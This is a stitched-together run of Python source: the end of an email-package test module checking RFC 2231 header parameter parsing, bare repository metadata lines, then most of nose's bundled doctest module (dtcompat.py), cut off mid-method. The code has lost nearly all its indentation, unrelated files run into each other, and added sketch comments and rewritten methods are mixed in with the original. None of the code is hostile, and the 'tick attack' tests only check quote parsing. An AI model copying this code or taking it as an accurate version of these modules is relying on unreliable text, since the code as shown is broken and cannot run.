Content-Type: text/plain; charset*=bogus''utf-8%E2%80%9D
"""
msg = email.message_from_string(m)
# This should return None because non-ascii characters in the charset
# are not allowed.
self.assertEqual(msg.get_content_charset(), None)
def test_rfc2231_bad_character_in_charset(self):
m = """\
Content-Type: text/plain; charset*=ascii''utf-8%E2%80%9D
"""
msg = email.message_from_string(m)
# This should return None because non-ascii characters in the charset
# are not allowed.
self.assertEqual(msg.get_content_charset(), None)
def test_rfc2231_bad_character_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="ascii'xx'This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2*="is it not.pdf%E2"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
u'This is even more ***fun*** is it not.pdf\ufffd')
def test_rfc2231_unknown_encoding(self):
m = """\
Content-Transfer-Encoding: 8bit
Content-Disposition: inline; filename*=X-UNKNOWN''myfile.txt
"""
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(), 'myfile.txt')
def test_rfc2231_single_tick_in_filename_extended(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"Frank's\"; name*1*=\" Document\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, None)
eq(language, None)
eq(s, "Frank's Document")
def test_rfc2231_single_tick_in_filename(self):
m = """\
Content-Type: application/x-foo; name*0=\"Frank's\"; name*1=\" Document\"
"""
msg = email.message_from_string(m)
param = msg.get_param('name')
self.failIf(isinstance(param, tuple))
self.assertEqual(param, "Frank's Document")
def test_rfc2231_tick_attack_extended(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"us-ascii'en-us'Frank's\"; name*1*=\" Document\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, "Frank's Document")
def test_rfc2231_tick_attack(self):
m = """\
Content-Type: application/x-foo;
\tname*0=\"us-ascii'en-us'Frank's\"; name*1=\" Document\"
"""
msg = email.message_from_string(m)
param = msg.get_param('name')
self.failIf(isinstance(param, tuple))
self.assertEqual(param, "us-ascii'en-us'Frank's Document")
def test_rfc2231_no_extended_values(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo; name=\"Frank's Document\"
"""
msg = email.message_from_string(m)
eq(msg.get_param('name'), "Frank's Document")
def test_rfc2231_encoded_then_unencoded_segments(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"us-ascii'en-us'My\";
\tname*1=\" Document\";
\tname*2*=\" For You\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, 'My Document For You')
def test_rfc2231_unencoded_then_encoded_segments(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0=\"us-ascii'en-us'My\";
\tname*1*=\" Document\";
\tname*2*=\" For You\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, 'My Document For You')
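# Illustrative sketch (added; the sample header is made up): an RFC
# 2231-encoded parameter comes back from get_param() as a
# (charset, language, value) triple.
def _rfc2231_demo():
    m = ("Content-Type: application/x-foo; "
         "name*=\"us-ascii'en'A%20Doc\"\n\nbody\n")
    msg = email.message_from_string(m)
    return msg.get_param('name')  # -> ('us-ascii', 'en', 'A Doc')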
def _testclasses():
mod = sys.modules[__name__]
return [getattr(mod, name) for name in dir(mod) if name.startswith('Test')]
def suite():
suite = unittest.TestSuite()
for testclass in _testclasses():
suite.addTest(unittest.makeSuite(testclass))
return suite
def test_main():
for testclass in _testclasses():
run_unittest(testclass)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
apache-2.0
|
kisel/trex-core
|
scripts/external_libs/nose-1.3.4/python3/nose/ext/dtcompat.py
|
11
|
88107
|
# Module doctest.
# Released to the public domain 16-Jan-2001, by Tim Peters (tim@python.org).
# Major enhancements and refactoring by:
# Jim Fulton
# Edward Loper
# Provided as-is; use at your own risk; no warranty; no promises; enjoy!
#
# Modified for inclusion in nose to provide support for DocFileTest in
# python 2.3:
#
# - all doctests removed from module (they fail under 2.3 and 2.5)
# - now handles the $py.class extension when run under Jython
r"""Module doctest -- a framework for running examples in docstrings.
In simplest use, end each module M to be tested with:
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
Then running the module as a script will cause the examples in the
docstrings to get executed and verified:
python M.py
This won't display anything unless an example fails, in which case the
failing example(s) and the cause(s) of the failure(s) are printed to stdout
(why not stderr? because stderr is a lame hack <0.2 wink>), and the final
line of output is "Test failed.".
Run it with the -v switch instead:
python M.py -v
and a detailed report of all examples tried is printed to stdout, along
with assorted summaries at the end.
You can force verbose mode by passing "verbose=True" to testmod, or prohibit
it by passing "verbose=False". In either of those cases, sys.argv is not
examined by testmod.
There are a variety of other ways to run doctests, including integration
with the unittest framework, and support for running non-Python text
files containing doctests. There are also many ways to override parts
of doctest's default behaviors. See the Library Reference Manual for
details.
"""
__docformat__ = 'reStructuredText en'
__all__ = [
# 0. Option Flags
'register_optionflag',
'DONT_ACCEPT_TRUE_FOR_1',
'DONT_ACCEPT_BLANKLINE',
'NORMALIZE_WHITESPACE',
'ELLIPSIS',
'IGNORE_EXCEPTION_DETAIL',
'COMPARISON_FLAGS',
'REPORT_UDIFF',
'REPORT_CDIFF',
'REPORT_NDIFF',
'REPORT_ONLY_FIRST_FAILURE',
'REPORTING_FLAGS',
# 1. Utility Functions
'is_private',
# 2. Example & DocTest
'Example',
'DocTest',
# 3. Doctest Parser
'DocTestParser',
# 4. Doctest Finder
'DocTestFinder',
# 5. Doctest Runner
'DocTestRunner',
'OutputChecker',
'DocTestFailure',
'UnexpectedException',
'DebugRunner',
# 6. Test Functions
'testmod',
'testfile',
'run_docstring_examples',
# 7. Tester
'Tester',
# 8. Unittest Support
'DocTestSuite',
'DocFileSuite',
'set_unittest_reportflags',
# 9. Debugging Support
'script_from_examples',
'testsource',
'debug_src',
'debug',
]
import __future__
import sys, traceback, inspect, linecache, os, re
import unittest, difflib, pdb, tempfile
import warnings
from io import StringIO
# Don't whine about the deprecated is_private function in this
# module's tests.
warnings.filterwarnings("ignore", "is_private", DeprecationWarning,
__name__, 0)
# There are 4 basic classes:
# - Example: a <source, want> pair, plus an intra-docstring line number.
# - DocTest: a collection of examples, parsed from a docstring, plus
# info about where the docstring came from (name, filename, lineno).
# - DocTestFinder: extracts DocTests from a given object's docstring and
# its contained objects' docstrings.
# - DocTestRunner: runs DocTest cases, and accumulates statistics.
#
# So the basic picture is:
#
# list of:
# +------+ +---------+ +-------+
# |object| --DocTestFinder-> | DocTest | --DocTestRunner-> |results|
# +------+ +---------+ +-------+
# | Example |
# | ... |
# | Example |
# +---------+
# Option constants.
OPTIONFLAGS_BY_NAME = {}
def register_optionflag(name):
# Create a new flag unless `name` is already known.
return OPTIONFLAGS_BY_NAME.setdefault(name, 1 << len(OPTIONFLAGS_BY_NAME))
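# Illustrative sketch (not part of the original module): each call to
# register_optionflag() hands out the next free bit, so the flags defined
# below are powers of two and combine with bitwise operators.
#
#     >>> OPTIONFLAGS_BY_NAME['NORMALIZE_WHITESPACE']
#     4
#     >>> flags = NORMALIZE_WHITESPACE | ELLIPSIS
#     >>> bool(flags & ELLIPSIS), bool(flags & REPORT_UDIFF)
#     (True, False)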
DONT_ACCEPT_TRUE_FOR_1 = register_optionflag('DONT_ACCEPT_TRUE_FOR_1')
DONT_ACCEPT_BLANKLINE = register_optionflag('DONT_ACCEPT_BLANKLINE')
NORMALIZE_WHITESPACE = register_optionflag('NORMALIZE_WHITESPACE')
ELLIPSIS = register_optionflag('ELLIPSIS')
IGNORE_EXCEPTION_DETAIL = register_optionflag('IGNORE_EXCEPTION_DETAIL')
COMPARISON_FLAGS = (DONT_ACCEPT_TRUE_FOR_1 |
DONT_ACCEPT_BLANKLINE |
NORMALIZE_WHITESPACE |
ELLIPSIS |
IGNORE_EXCEPTION_DETAIL)
REPORT_UDIFF = register_optionflag('REPORT_UDIFF')
REPORT_CDIFF = register_optionflag('REPORT_CDIFF')
REPORT_NDIFF = register_optionflag('REPORT_NDIFF')
REPORT_ONLY_FIRST_FAILURE = register_optionflag('REPORT_ONLY_FIRST_FAILURE')
REPORTING_FLAGS = (REPORT_UDIFF |
REPORT_CDIFF |
REPORT_NDIFF |
REPORT_ONLY_FIRST_FAILURE)
# Special string markers for use in `want` strings:
BLANKLINE_MARKER = '<BLANKLINE>'
ELLIPSIS_MARKER = '...'
######################################################################
## Table of Contents
######################################################################
# 1. Utility Functions
# 2. Example & DocTest -- store test cases
# 3. DocTest Parser -- extracts examples from strings
# 4. DocTest Finder -- extracts test cases from objects
# 5. DocTest Runner -- runs test cases
# 6. Test Functions -- convenient wrappers for testing
# 7. Tester Class -- for backwards compatibility
# 8. Unittest Support
# 9. Debugging Support
# 10. Example Usage
######################################################################
## 1. Utility Functions
######################################################################
def is_private(prefix, base):
"""prefix, base -> true iff name prefix + "." + base is "private".
Prefix may be an empty string, and base does not contain a period.
Prefix is ignored (although functions you write conforming to this
protocol may make use of it).
Return true iff base begins with an (at least one) underscore, but
does not both begin and end with (at least) two underscores.
"""
warnings.warn("is_private is deprecated; it wasn't useful; "
"examine DocTestFinder.find() lists instead",
DeprecationWarning, stacklevel=2)
return base[:1] == "_" and not base[:2] == "__" == base[-2:]
def _extract_future_flags(globs):
"""
Return the compiler-flags associated with the future features that
have been imported into the given namespace (globs).
"""
flags = 0
for fname in __future__.all_feature_names:
feature = globs.get(fname, None)
if feature is getattr(__future__, fname):
flags |= feature.compiler_flag
return flags
def _normalize_module(module, depth=2):
"""
Return the module specified by `module`. In particular:
- If `module` is a module, then return module.
- If `module` is a string, then import and return the
module with that name.
- If `module` is None, then return the calling module.
The calling module is assumed to be the module of
the stack frame at the given depth in the call stack.
"""
if inspect.ismodule(module):
return module
elif isinstance(module, str):
return __import__(module, globals(), locals(), ["*"])
elif module is None:
return sys.modules[sys._getframe(depth).f_globals['__name__']]
else:
raise TypeError("Expected a module, string, or None")
def _indent(s, indent=4):
"""
Add the given number of space characters to the beginning every
non-blank line in `s`, and return the result.
"""
# This regexp matches the start of non-blank lines:
return re.sub('(?m)^(?!$)', indent*' ', s)
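# Illustrative sketch (not part of the original module): _indent() only
# touches non-blank lines.
#
#     >>> _indent('a\nb\n')
#     '    a\n    b\n'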
def _exception_traceback(exc_info):
"""
Return a string containing a traceback message for the given
exc_info tuple (as returned by sys.exc_info()).
"""
# Get a traceback message.
excout = StringIO()
exc_type, exc_val, exc_tb = exc_info
traceback.print_exception(exc_type, exc_val, exc_tb, file=excout)
return excout.getvalue()
# Override some StringIO methods.
class _SpoofOut(StringIO):
def getvalue(self):
result = StringIO.getvalue(self)
# If anything at all was written, make sure there's a trailing
# newline. There's no way for the expected output to indicate
# that a trailing newline is missing.
if result and not result.endswith("\n"):
result += "\n"
# Prevent softspace from screwing up the next test case, in
# case they used print with a trailing comma in an example.
if hasattr(self, "softspace"):
del self.softspace
return result
    def truncate(self, size=None):
        # In Python 3, truncate() does not move the stream position, so
        # seek first; otherwise the next write would pad the buffer with
        # NUL characters.
        self.seek(size if size is not None else 0)
        StringIO.truncate(self)
        if hasattr(self, "softspace"):
            del self.softspace
# Worst-case linear-time ellipsis matching.
def _ellipsis_match(want, got):
if ELLIPSIS_MARKER not in want:
return want == got
# Find "the real" strings.
ws = want.split(ELLIPSIS_MARKER)
assert len(ws) >= 2
# Deal with exact matches possibly needed at one or both ends.
startpos, endpos = 0, len(got)
w = ws[0]
if w: # starts with exact match
if got.startswith(w):
startpos = len(w)
del ws[0]
else:
return False
w = ws[-1]
if w: # ends with exact match
if got.endswith(w):
endpos -= len(w)
del ws[-1]
else:
return False
if startpos > endpos:
# Exact end matches required more characters than we have, as in
# _ellipsis_match('aa...aa', 'aaa')
return False
# For the rest, we only need to find the leftmost non-overlapping
# match for each piece. If there's no overall match that way alone,
# there's no overall match period.
for w in ws:
# w may be '' at times, if there are consecutive ellipses, or
# due to an ellipsis at the start or end of `want`. That's OK.
# Search for an empty string succeeds, and doesn't change startpos.
startpos = got.find(w, startpos, endpos)
if startpos < 0:
return False
startpos += len(w)
return True
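# Illustrative sketch (not part of the original module): a couple of
# _ellipsis_match() cases, including the end-overlap guard noted above.
#
#     >>> _ellipsis_match('a...c', 'abbbc')
#     True
#     >>> _ellipsis_match('aa...aa', 'aaa')
#     False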
def _comment_line(line):
"Return a commented form of the given line"
line = line.rstrip()
if line:
return '# '+line
else:
return '#'
class _OutputRedirectingPdb(pdb.Pdb):
"""
A specialized version of the python debugger that redirects stdout
to a given stream when interacting with the user. Stdout is *not*
redirected when traced code is executed.
"""
def __init__(self, out):
self.__out = out
pdb.Pdb.__init__(self)
def trace_dispatch(self, *args):
# Redirect stdout to the given stream.
save_stdout = sys.stdout
sys.stdout = self.__out
# Call Pdb's trace dispatch method.
try:
return pdb.Pdb.trace_dispatch(self, *args)
finally:
sys.stdout = save_stdout
# [XX] Normalize with respect to os.path.pardir?
def _module_relative_path(module, path):
if not inspect.ismodule(module):
raise TypeError('Expected a module: %r' % module)
if path.startswith('/'):
raise ValueError('Module-relative files may not have absolute paths')
# Find the base directory for the path.
if hasattr(module, '__file__'):
# A normal module/package
basedir = os.path.split(module.__file__)[0]
elif module.__name__ == '__main__':
# An interactive session.
if len(sys.argv)>0 and sys.argv[0] != '':
basedir = os.path.split(sys.argv[0])[0]
else:
basedir = os.curdir
else:
# A module w/o __file__ (this includes builtins)
raise ValueError("Can't resolve paths relative to the module " +
module + " (it has no __file__)")
# Combine the base directory and the path.
return os.path.join(basedir, *(path.split('/')))
######################################################################
## 2. Example & DocTest
######################################################################
## - An "example" is a <source, want> pair, where "source" is a
## fragment of source code, and "want" is the expected output for
## "source." The Example class also includes information about
## where the example was extracted from.
##
## - A "doctest" is a collection of examples, typically extracted from
## a string (such as an object's docstring). The DocTest class also
## includes information about where the string was extracted from.
class Example:
"""
A single doctest example, consisting of source code and expected
output. `Example` defines the following attributes:
- source: A single Python statement, always ending with a newline.
The constructor adds a newline if needed.
- want: The expected output from running the source code (either
from stdout, or a traceback in case of exception). `want` ends
with a newline unless it's empty, in which case it's an empty
string. The constructor adds a newline if needed.
- exc_msg: The exception message generated by the example, if
the example is expected to generate an exception; or `None` if
it is not expected to generate an exception. This exception
message is compared against the return value of
`traceback.format_exception_only()`. `exc_msg` ends with a
newline unless it's `None`. The constructor adds a newline
if needed.
- lineno: The line number within the DocTest string containing
this Example where the Example begins. This line number is
zero-based, with respect to the beginning of the DocTest.
- indent: The example's indentation in the DocTest string.
        I.e., the number of space characters that precede the
example's first prompt.
- options: A dictionary mapping from option flags to True or
False, which is used to override default options for this
example. Any option flags not contained in this dictionary
are left at their default value (as specified by the
DocTestRunner's optionflags). By default, no options are set.
"""
def __init__(self, source, want, exc_msg=None, lineno=0, indent=0,
options=None):
# Normalize inputs.
if not source.endswith('\n'):
source += '\n'
if want and not want.endswith('\n'):
want += '\n'
if exc_msg is not None and not exc_msg.endswith('\n'):
exc_msg += '\n'
# Store properties.
self.source = source
self.want = want
self.lineno = lineno
self.indent = indent
if options is None: options = {}
self.options = options
self.exc_msg = exc_msg
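# Illustrative sketch (not part of the original module): the constructor
# normalizes a missing trailing newline on both `source` and `want`.
#
#     >>> ex = Example('print(2 + 2)', '4')
#     >>> ex.source, ex.want, ex.exc_msg
#     ('print(2 + 2)\n', '4\n', None)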
class DocTest:
"""
A collection of doctest examples that should be run in a single
namespace. Each `DocTest` defines the following attributes:
- examples: the list of examples.
- globs: The namespace (aka globals) that the examples should
be run in.
- name: A name identifying the DocTest (typically, the name of
the object whose docstring this DocTest was extracted from).
- filename: The name of the file that this DocTest was extracted
from, or `None` if the filename is unknown.
- lineno: The line number within filename where this DocTest
begins, or `None` if the line number is unavailable. This
line number is zero-based, with respect to the beginning of
the file.
- docstring: The string that the examples were extracted from,
or `None` if the string is unavailable.
"""
def __init__(self, examples, globs, name, filename, lineno, docstring):
"""
Create a new DocTest containing the given examples. The
DocTest's globals are initialized with a copy of `globs`.
"""
assert not isinstance(examples, str), \
"DocTest no longer accepts str; use DocTestParser instead"
self.examples = examples
self.docstring = docstring
self.globs = globs.copy()
self.name = name
self.filename = filename
self.lineno = lineno
def __repr__(self):
if len(self.examples) == 0:
examples = 'no examples'
elif len(self.examples) == 1:
examples = '1 example'
else:
examples = '%d examples' % len(self.examples)
return ('<DocTest %s from %s:%s (%s)>' %
(self.name, self.filename, self.lineno, examples))
    # This lets us sort tests by name.  Python 3 has no __cmp__/cmp(),
    # so define the rich comparisons that list.sort() actually needs:
    def _cmpkey(self):
        return (self.name, self.filename, self.lineno, id(self))
    def __eq__(self, other):
        return isinstance(other, DocTest) and self._cmpkey() == other._cmpkey()
    def __lt__(self, other):
        return isinstance(other, DocTest) and self._cmpkey() < other._cmpkey()
######################################################################
## 3. DocTestParser
######################################################################
class DocTestParser:
"""
A class used to parse strings containing doctest examples.
"""
# This regular expression is used to find doctest examples in a
# string. It defines three groups: `source` is the source code
# (including leading indentation and prompts); `indent` is the
# indentation of the first (PS1) line of the source code; and
# `want` is the expected output (including leading indentation).
_EXAMPLE_RE = re.compile(r'''
# Source consists of a PS1 line followed by zero or more PS2 lines.
(?P<source>
(?:^(?P<indent> [ ]*) >>> .*) # PS1 line
(?:\n [ ]* \.\.\. .*)*) # PS2 lines
\n?
# Want consists of any non-blank lines that do not start with PS1.
(?P<want> (?:(?![ ]*$) # Not a blank line
(?![ ]*>>>) # Not a line starting with PS1
.*$\n? # But any other line
)*)
''', re.MULTILINE | re.VERBOSE)
# A regular expression for handling `want` strings that contain
# expected exceptions. It divides `want` into three pieces:
# - the traceback header line (`hdr`)
# - the traceback stack (`stack`)
# - the exception message (`msg`), as generated by
# traceback.format_exception_only()
# `msg` may have multiple lines. We assume/require that the
# exception message is the first non-indented line starting with a word
# character following the traceback header line.
_EXCEPTION_RE = re.compile(r"""
# Grab the traceback header. Different versions of Python have
# said different things on the first traceback line.
^(?P<hdr> Traceback\ \(
(?: most\ recent\ call\ last
| innermost\ last
) \) :
)
\s* $ # toss trailing whitespace on the header.
(?P<stack> .*?) # don't blink: absorb stuff until...
^ (?P<msg> \w+ .*) # a line *starts* with alphanum.
""", re.VERBOSE | re.MULTILINE | re.DOTALL)
# A callable returning a true value iff its argument is a blank line
# or contains a single comment.
_IS_BLANK_OR_COMMENT = re.compile(r'^[ ]*(#.*)?$').match
def parse(self, string, name='<string>'):
"""
Divide the given string into examples and intervening text,
and return them as a list of alternating Examples and strings.
Line numbers for the Examples are 0-based. The optional
argument `name` is a name identifying this string, and is only
used for error messages.
"""
string = string.expandtabs()
# If all lines begin with the same indentation, then strip it.
min_indent = self._min_indent(string)
if min_indent > 0:
string = '\n'.join([l[min_indent:] for l in string.split('\n')])
output = []
charno, lineno = 0, 0
# Find all doctest examples in the string:
for m in self._EXAMPLE_RE.finditer(string):
# Add the pre-example text to `output`.
output.append(string[charno:m.start()])
# Update lineno (lines before this example)
lineno += string.count('\n', charno, m.start())
# Extract info from the regexp match.
(source, options, want, exc_msg) = \
self._parse_example(m, name, lineno)
# Create an Example, and add it to the list.
if not self._IS_BLANK_OR_COMMENT(source):
output.append( Example(source, want, exc_msg,
lineno=lineno,
indent=min_indent+len(m.group('indent')),
options=options) )
# Update lineno (lines inside this example)
lineno += string.count('\n', m.start(), m.end())
# Update charno.
charno = m.end()
# Add any remaining post-example text to `output`.
output.append(string[charno:])
return output
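    # Illustrative sketch (not part of the original module): parse() yields
    # alternating prose and Example objects; a blank line terminates the
    # expected output.
    #
    #     >>> parts = DocTestParser().parse("Intro.\n>>> 1 + 1\n2\n\nOutro.\n")
    #     >>> parts[0], isinstance(parts[1], Example), parts[2]
    #     ('Intro.\n', True, '\nOutro.\n')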
def get_doctest(self, string, globs, name, filename, lineno):
"""
Extract all doctest examples from the given string, and
collect them into a `DocTest` object.
`globs`, `name`, `filename`, and `lineno` are attributes for
the new `DocTest` object. See the documentation for `DocTest`
for more information.
"""
return DocTest(self.get_examples(string, name), globs,
name, filename, lineno, string)
def get_examples(self, string, name='<string>'):
"""
Extract all doctest examples from the given string, and return
them as a list of `Example` objects. Line numbers are
0-based, because it's most common in doctests that nothing
interesting appears on the same line as opening triple-quote,
and so the first interesting line is called \"line 1\" then.
The optional argument `name` is a name identifying this
string, and is only used for error messages.
"""
return [x for x in self.parse(string, name)
if isinstance(x, Example)]
def _parse_example(self, m, name, lineno):
"""
Given a regular expression match from `_EXAMPLE_RE` (`m`),
return a pair `(source, want)`, where `source` is the matched
example's source code (with prompts and indentation stripped);
and `want` is the example's expected output (with indentation
stripped).
`name` is the string's name, and `lineno` is the line number
where the example starts; both are used for error messages.
"""
# Get the example's indentation level.
indent = len(m.group('indent'))
# Divide source into lines; check that they're properly
# indented; and then strip their indentation & prompts.
source_lines = m.group('source').split('\n')
self._check_prompt_blank(source_lines, indent, name, lineno)
self._check_prefix(source_lines[1:], ' '*indent + '.', name, lineno)
source = '\n'.join([sl[indent+4:] for sl in source_lines])
# Divide want into lines; check that it's properly indented; and
# then strip the indentation. Spaces before the last newline should
# be preserved, so plain rstrip() isn't good enough.
want = m.group('want')
want_lines = want.split('\n')
if len(want_lines) > 1 and re.match(r' *$', want_lines[-1]):
del want_lines[-1] # forget final newline & spaces after it
self._check_prefix(want_lines, ' '*indent, name,
lineno + len(source_lines))
want = '\n'.join([wl[indent:] for wl in want_lines])
# If `want` contains a traceback message, then extract it.
m = self._EXCEPTION_RE.match(want)
if m:
exc_msg = m.group('msg')
else:
exc_msg = None
# Extract options from the source.
options = self._find_options(source, name, lineno)
return source, options, want, exc_msg
# This regular expression looks for option directives in the
# source code of an example. Option directives are comments
# starting with "doctest:". Warning: this may give false
# positives for string-literals that contain the string
# "#doctest:". Eliminating these false positives would require
# actually parsing the string; but we limit them by ignoring any
# line containing "#doctest:" that is *followed* by a quote mark.
_OPTION_DIRECTIVE_RE = re.compile(r'#\s*doctest:\s*([^\n\'"]*)$',
re.MULTILINE)
def _find_options(self, source, name, lineno):
"""
Return a dictionary containing option overrides extracted from
option directives in the given source string.
`name` is the string's name, and `lineno` is the line number
where the example starts; both are used for error messages.
"""
options = {}
# (note: with the current regexp, this will match at most once:)
for m in self._OPTION_DIRECTIVE_RE.finditer(source):
option_strings = m.group(1).replace(',', ' ').split()
for option in option_strings:
if (option[0] not in '+-' or
option[1:] not in OPTIONFLAGS_BY_NAME):
raise ValueError('line %r of the doctest for %s '
'has an invalid option: %r' %
(lineno+1, name, option))
flag = OPTIONFLAGS_BY_NAME[option[1:]]
options[flag] = (option[0] == '+')
if options and self._IS_BLANK_OR_COMMENT(source):
raise ValueError('line %r of the doctest for %s has an option '
'directive on a line with no example: %r' %
(lineno, name, source))
return options
# This regular expression finds the indentation of every non-blank
# line in a string.
    _INDENT_RE = re.compile(r'^([ ]*)(?=\S)', re.MULTILINE)
def _min_indent(self, s):
"Return the minimum indentation of any non-blank line in `s`"
indents = [len(indent) for indent in self._INDENT_RE.findall(s)]
if len(indents) > 0:
return min(indents)
else:
return 0
def _check_prompt_blank(self, lines, indent, name, lineno):
"""
Given the lines of a source string (including prompts and
leading indentation), check to make sure that every prompt is
followed by a space character. If any line is not followed by
a space character, then raise ValueError.
"""
for i, line in enumerate(lines):
if len(line) >= indent+4 and line[indent+3] != ' ':
raise ValueError('line %r of the docstring for %s '
'lacks blank after %s: %r' %
(lineno+i+1, name,
line[indent:indent+3], line))
def _check_prefix(self, lines, prefix, name, lineno):
"""
Check that every line in the given list starts with the given
prefix; if any line does not, then raise a ValueError.
"""
for i, line in enumerate(lines):
if line and not line.startswith(prefix):
raise ValueError('line %r of the docstring for %s has '
'inconsistent leading whitespace: %r' %
(lineno+i+1, name, line))
######################################################################
## 4. DocTest Finder
######################################################################
class DocTestFinder:
"""
A class used to extract the DocTests that are relevant to a given
object, from its docstring and the docstrings of its contained
objects. Doctests can currently be extracted from the following
object types: modules, functions, classes, methods, staticmethods,
classmethods, and properties.
"""
def __init__(self, verbose=False, parser=DocTestParser(),
recurse=True, _namefilter=None, exclude_empty=True):
"""
Create a new doctest finder.
The optional argument `parser` specifies a class or
function that should be used to create new DocTest objects (or
objects that implement the same interface as DocTest). The
signature for this factory function should match the signature
of the DocTest constructor.
If the optional argument `recurse` is false, then `find` will
only examine the given object, and not any contained objects.
If the optional argument `exclude_empty` is false, then `find`
will include tests for objects with empty docstrings.
"""
self._parser = parser
self._verbose = verbose
self._recurse = recurse
self._exclude_empty = exclude_empty
# _namefilter is undocumented, and exists only for temporary backward-
# compatibility support of testmod's deprecated isprivate mess.
self._namefilter = _namefilter
def find(self, obj, name=None, module=None, globs=None,
extraglobs=None):
"""
Return a list of the DocTests that are defined by the given
object's docstring, or by any of its contained objects'
docstrings.
The optional parameter `module` is the module that contains
the given object. If the module is not specified or is None, then
the test finder will attempt to automatically determine the
correct module. The object's module is used:
- As a default namespace, if `globs` is not specified.
- To prevent the DocTestFinder from extracting DocTests
from objects that are imported from other modules.
- To find the name of the file containing the object.
- To help find the line number of the object within its
file.
Contained objects whose module does not match `module` are ignored.
If `module` is False, no attempt to find the module will be made.
This is obscure, of use mostly in tests: if `module` is False, or
is None but cannot be found automatically, then all objects are
considered to belong to the (non-existent) module, so all contained
objects will (recursively) be searched for doctests.
The globals for each DocTest is formed by combining `globs`
and `extraglobs` (bindings in `extraglobs` override bindings
in `globs`). A new copy of the globals dictionary is created
for each DocTest. If `globs` is not specified, then it
defaults to the module's `__dict__`, if specified, or {}
otherwise. If `extraglobs` is not specified, then it defaults
to {}.
"""
# If name was not specified, then extract it from the object.
if name is None:
name = getattr(obj, '__name__', None)
if name is None:
raise ValueError("DocTestFinder.find: name must be given "
"when obj.__name__ doesn't exist: %r" %
(type(obj),))
# Find the module that contains the given object (if obj is
# a module, then module=obj.). Note: this may fail, in which
# case module will be None.
if module is False:
module = None
elif module is None:
module = inspect.getmodule(obj)
# Read the module's source code. This is used by
# DocTestFinder._find_lineno to find the line number for a
# given object's docstring.
try:
file = inspect.getsourcefile(obj) or inspect.getfile(obj)
source_lines = linecache.getlines(file)
if not source_lines:
source_lines = None
except TypeError:
source_lines = None
# Initialize globals, and merge in extraglobs.
if globs is None:
if module is None:
globs = {}
else:
globs = module.__dict__.copy()
else:
globs = globs.copy()
if extraglobs is not None:
globs.update(extraglobs)
        # Recursively explore `obj`, extracting DocTests.
tests = []
self._find(tests, obj, name, module, source_lines, globs, {})
# Sort the tests by alpha order of names, for consistency in
# verbose-mode output. This was a feature of doctest in Pythons
# <= 2.3 that got lost by accident in 2.4. It was repaired in
# 2.4.4 and 2.5.
tests.sort()
return tests
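    # Illustrative sketch (not part of the original module): `add` is a
    # hypothetical function used only to show what find() returns.
    #
    #     >>> def add(a, b):
    #     ...     '''
    #     ...     >>> add(1, 1)
    #     ...     2
    #     ...     '''
    #     ...     return a + b
    #     >>> tests = DocTestFinder().find(add)
    #     >>> len(tests), tests[0].name
    #     (1, 'add')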
def _filter(self, obj, prefix, base):
"""
Return true if the given object should not be examined.
"""
return (self._namefilter is not None and
self._namefilter(prefix, base))
def _from_module(self, module, object):
"""
Return true if the given object is defined in the given
module.
"""
if module is None:
return True
elif inspect.isfunction(object):
return module.__dict__ is object.__globals__
elif inspect.isclass(object):
# Some jython classes don't set __module__
return module.__name__ == getattr(object, '__module__', None)
elif inspect.getmodule(object) is not None:
return module is inspect.getmodule(object)
elif hasattr(object, '__module__'):
return module.__name__ == object.__module__
elif isinstance(object, property):
            return True # [XX] no way to be sure.
else:
raise ValueError("object must be a class or function")
def _find(self, tests, obj, name, module, source_lines, globs, seen):
"""
Find tests for the given object and any contained objects, and
add them to `tests`.
"""
if self._verbose:
print('Finding tests in %s' % name)
# If we've already processed this object, then ignore it.
if id(obj) in seen:
return
seen[id(obj)] = 1
# Find a test for this object, and add it to the list of tests.
test = self._get_test(obj, name, module, globs, source_lines)
if test is not None:
tests.append(test)
# Look for tests in a module's contained objects.
if inspect.ismodule(obj) and self._recurse:
for valname, val in list(obj.__dict__.items()):
# Check if this contained object should be ignored.
if self._filter(val, name, valname):
continue
valname = '%s.%s' % (name, valname)
# Recurse to functions & classes.
if ((inspect.isfunction(val) or inspect.isclass(val)) and
self._from_module(module, val)):
self._find(tests, val, valname, module, source_lines,
globs, seen)
# Look for tests in a module's __test__ dictionary.
if inspect.ismodule(obj) and self._recurse:
for valname, val in list(getattr(obj, '__test__', {}).items()):
if not isinstance(valname, str):
raise ValueError("DocTestFinder.find: __test__ keys "
"must be strings: %r" %
(type(valname),))
if not (inspect.isfunction(val) or inspect.isclass(val) or
inspect.ismethod(val) or inspect.ismodule(val) or
isinstance(val, str)):
raise ValueError("DocTestFinder.find: __test__ values "
"must be strings, functions, methods, "
"classes, or modules: %r" %
(type(val),))
valname = '%s.__test__.%s' % (name, valname)
self._find(tests, val, valname, module, source_lines,
globs, seen)
# Look for tests in a class's contained objects.
if inspect.isclass(obj) and self._recurse:
for valname, val in list(obj.__dict__.items()):
# Check if this contained object should be ignored.
if self._filter(val, name, valname):
continue
# Special handling for staticmethod/classmethod.
if isinstance(val, staticmethod):
val = getattr(obj, valname)
if isinstance(val, classmethod):
val = getattr(obj, valname).__func__
# Recurse to methods, properties, and nested classes.
if ((inspect.isfunction(val) or inspect.isclass(val) or
isinstance(val, property)) and
self._from_module(module, val)):
valname = '%s.%s' % (name, valname)
self._find(tests, val, valname, module, source_lines,
globs, seen)
def _get_test(self, obj, name, module, globs, source_lines):
"""
Return a DocTest for the given object, if it defines a docstring;
otherwise, return None.
"""
